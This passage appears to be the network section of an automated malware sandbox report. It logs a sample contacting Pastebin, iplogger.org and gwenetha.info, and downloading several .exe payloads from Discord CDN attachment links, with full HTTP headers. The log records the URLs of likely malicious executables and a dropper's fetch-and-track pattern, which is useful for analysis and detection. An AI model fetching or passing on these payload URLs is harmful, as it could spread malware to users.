Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| gwenetha.info | 104.21.12.27 | |
| pastebin.com | 104.23.98.190 | |
| iplogger.org | 88.99.66.31 | |
| cdn.discordapp.com | 162.159.135.233 | |
| whatitis.website | | |
TCP Requests (source -> destination)
- 192.168.56.102:49807 -> 192.168.56.103:5357
- 192.168.56.102:49808 -> 192.168.56.103:2869
- 192.168.56.102:49811 -> 192.168.56.103:5357
- 192.168.56.103:49598 -> 104.21.12.27:443 (gwenetha.info)
- 192.168.56.103:49594 -> 104.23.99.190:443 (pastebin.com)
- 192.168.56.103:49595 -> 162.159.129.233:443 (cdn.discordapp.com)
- 192.168.56.103:49597 -> 162.159.135.233:443 (cdn.discordapp.com)
- 192.168.56.103:49599 -> 162.159.135.233:443 (cdn.discordapp.com)
- 192.168.56.103:49600 -> 162.159.135.233:443 (cdn.discordapp.com)
- 192.168.56.103:49596 -> 88.99.66.31:443 (iplogger.org)
UDP Requests (source -> destination)
- 192.168.56.103:56376 -> 164.124.101.2:53
- 192.168.56.103:58285 -> 164.124.101.2:53
- 192.168.56.103:58575 -> 164.124.101.2:53
- 192.168.56.103:58935 -> 164.124.101.2:53
- 192.168.56.103:62494 -> 164.124.101.2:53
- 192.168.56.103:64714 -> 164.124.101.2:53
- 192.168.56.103:65511 -> 164.124.101.2:53
- 192.168.56.103:3702 -> 192.168.56.102:56756
- 192.168.56.103:137 -> 192.168.56.255:137
- 192.168.56.103:138 -> 192.168.56.255:138
- 192.168.56.103:1900 -> 239.255.255.250:1900
- 192.168.56.103:49152 -> 239.255.255.250:3702
- 192.168.56.103:50368 -> 239.255.255.250:1900
- 52.231.114.183:123 -> 192.168.56.103:123

HTTP Requests
GET 200 https://pastebin.com/raw/gCyjHCCH

Request:

```http
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 01:24:35 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d87340cea551b165946927ceb49a931731617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 441
cf-request-id: 094b877881000012cadb9be000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63bf750739c112ca-ICN
```
GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe

Request:

```http
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 01:24:35 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d910dcd54018a1bf1307d0541146f44501617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63bf750789f3e9cc-ICN
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 01:24:35 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094b8778b80000e9cc6da4b000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UylgwfdyOOWBJ9dS-Xcqst7QYowf0pEF4wncUrGQ0Dprg540KlcUNVzKkx3YJDjOvffZnEaSNv1f9qji3qyVLo3hr56iA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QDAUzSXzycce%2FJB69h8SSeutSqqKxq%2BvosxHrDZ%2BdS3MM1LptZr%2BT9vKzd70%2F2afrd4cWZ%2F0qKqdvjS%2F3Hj2%2FA4I2XV3UyXVFjuBp%2FGHOndv8Jw%3D"}],"max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
```
GET 403 https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe

Request:

```http
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 01:24:35 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=da0b986289125cf9afe0b5525bd4fcdf81617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63bf7507997e3526-ICN
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 01:24:35 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094b8778bf00003526ff319000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uwm0XRYFEW2i7b_brz6gt4UnfkpzkNXbHnnZFRk5u-0nCOctdKYz9n09N_nyb7KQUp5tN9l-RFlsVi2Yb55QQ6IyvDuMA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dPFCmAs5narNXFd9E0cVNSAPrkhu5JVY17L%2Bs190F6RO%2B2vozufPY81Uur1uI9l96YKzdgkzEZ34IXGAxCWWETkfKDHeBvPZ%2B3iXZABTcTHM2tI%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
```
GET 404 https://gwenetha.info/setup-KGQJ-1.exe

Request:

```http
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 404 Not Found
Date: Wed, 07 Apr 2021 01:24:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=dbbe39050d3d54c4a7e3db30725aa3bf01617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 094b877acf0000eb4d24045000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VCP99QU1%2Bg%2BJk42MDYD0HyDMDzqt%2BsOhmBk1yK3IkBcpaa%2BgdnlG%2BL2loJILA%2B1Y8jL6juV27AcyLL%2FRm7kHatYlb95TkQ6lFf1VKLxK"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63bf750ae8e5eb4d-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
```
GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe

Request:

```http
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com
```

Response:

```http
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 01:24:36 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=dde60735cc844582f6f04e9094e4c9e4c1617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63bf750a9f75e9f8-ICN
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 01:24:35 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094b877a9c0000e9f8a10aa000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uxlbs8brE9RsZ5F8E_z1R7FG7dSYZnNIENMkJaXh3aHZya4ZkmC-odE-nUvEpsuFieF5_oQ-az2TJ8nEfXkJ_vTbJ030Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UIzutKdcWa5gpLp0SLlMaEjtPCbflLOVM%2Buxtg%2BegiPP9Vv6Vbsf4SijUCy8MvbNMZjjrhUlU7C%2BI72KjC0J5J5rj2ZwpQpcoTAnmsBFSKqIP1g%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
```
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe

Request:

```http
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
```

Response:

```http
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 01:24:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dde60735cc844582f6f04e9094e4c9e4c1617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 094b877ab00000e9f8a417b000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1%2FDKNuXt8g%2BQPIkWdfWEW1WMYF8OZKM8m8fEDWcBUdAONM4ceb6RLN%2B93UIKIRAyZDDvQV1DWSY2ezOxUAaUwkX6M47yluY34y5RcIRccxd4JII%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63bf750abfaae9f8-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
```
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe

Request:

```http
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
```

Response:

```http
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 01:24:38 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d26e9aa6dea121977e4ec3ff0b3f53d851617758678; expires=Fri, 07-May-21 01:24:38 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63bf751b3e19e9f8-ICN
Accept-Ranges: bytes
Age: 613687
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Thu, 07 Apr 2022 01:24:38 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094b8785040000e9f8feab3000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kGdWAxbrFECQNItNOWPym3bOolbBfaewHs%2F6GmOLN0MGk%2BuX6DmZlXckU%2BLX6cwOhYqoYhQXC%2Fn%2BPgyjHbXk6Hqlt%2FFWBYaaUGkEN3VacuZ51xA%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts